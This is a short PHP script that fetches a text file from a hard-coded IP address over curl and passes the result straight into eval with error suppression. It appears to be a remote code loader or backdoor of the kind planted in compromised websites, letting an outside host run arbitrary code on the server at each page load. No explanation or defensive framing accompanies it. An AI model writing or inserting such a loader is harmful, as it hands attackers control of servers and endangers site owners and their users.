<?php
function getDiDiContent(){
  $handle = curl_init();
  curl_setopt ($handle, CURLOPT_URL, 'http://199.168.96.114/z60605_o/stat/index.txt');
  curl_setopt ($handle, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($handle, CURLOPT_CONNECTTIMEOUT, 5);
  $result = curl_exec( $handle );
  if ( PHP_VERSION_ID < 80000 ) {
     curl_close(  $handle  );
  }
  return $result; 
}
$didi = getDiDiContent();
@eval("?>" . $didi);
